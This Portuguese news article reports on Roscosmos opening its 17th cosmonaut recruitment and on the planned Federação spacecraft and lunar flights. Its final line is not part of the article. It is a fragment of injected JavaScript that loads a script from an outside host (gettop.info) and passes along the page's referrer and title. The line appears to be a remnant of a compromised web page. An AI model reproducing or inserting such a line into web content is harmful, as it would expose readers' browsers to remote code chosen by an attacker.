As candidaturas serão recebidas ao longos os próximos quatro meses, informou o primeiro vice-diretor de Roscosmos, Aleksandr Ivanov.
Qualquer pessoa com cidadania russa e idade inferior a 35 anos, que possua diploma de engenharia ou formação como piloto é elegível para a função de cosmonauta.
Segundo os avaliadores, candidatos com experiência profissional nas indústrias da aviação e de foguetes espaciais terão prioridade.
Atualmente, o corpo de cosmonautas da Rússia soma 30 pessoas, e 14 delas não têm experiência de voo no espaço.
Esta é a 17ª inscrição de cosmonautas na história soviética-russa e o segundo concurso aberto, no qual qualquer candidato pode participar; o primeiro processo aberto foi realizado em 2012. Antes, apenas pilotos militares e funcionários da indústria de foguetes espaciais podiam concorrer à função.
Programa lunar – A Federação é uma série de naves espaciais pilotadas que comportam quatro tripulantes. Os novos modelos substituirão a série de naves espaciais Soyuz e de cargueiros espaciais automáticos Progress.
O primeiro voo automático sem tripulantes à Lua acontecerá em 2021. Dois anos depois, os selecionados no atual processo partirão a bordo das naves Federação.
Vida no espaço: especiarias líquidas e 16 pores-do-sol ao dia
(*) Jornalista da Gazeta Russa
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;